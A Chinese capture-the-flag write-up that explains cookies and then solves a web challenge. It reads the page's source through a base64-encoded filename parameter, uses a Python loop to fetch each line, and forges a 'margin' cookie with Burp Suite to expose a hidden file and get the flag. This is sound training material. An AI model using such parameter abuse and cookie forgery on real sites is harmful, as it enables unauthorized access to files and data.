什么是cookie
其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。
cookie可以在报文头的前面进行设置。
例题:
打开是一连串字母,没有用处
于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=
filename是编码了的,一般是base64,解码后是keys.txt
进文件看一看
又是一串数字,貌似没有用了。好像没有其它方法了。
再看URL,发现有参数line和filename,line可能是行号解析,filename是文件名,改一下行号,改为1
发现没有现象,猜测可能keys.txt只有一行,而且flag没在这个里面。除了keys.txt外,还有index.php文件,我们把它base64编码后查看一下,其编码为:aW5kZXgucGhw
于是弄一个访问:http://123.206.87.240:8002/web11/index.php?line=0&filename=aW5kZXgucGhw
,发现没有输出,可能是php的头行<?php 不能echo导致,将line换为1http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw
拿到了源码,这样一句一句拿肯定很慢,于是用python的Request进行自动化脚本
import requests
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
mysession = requests.session()
s = ''
for i in range(0, 40):
r = mysession.get(url1+str(i)+url2) # 读取每一行代码
s = s + r.text
print(s)
得到了index.php的源码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");//重定向到index.php
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
error_reporting(0)是不对php报错
:?是三元运算符
经过分析,只要文件名file为keys.php并且键值对都为margin的cookie就能得到keys.php的内容
这里我们用burpsuite来改包
在回应中就得到了flag
总结
cookie可以篡改,要擅于从URL中找到切入点。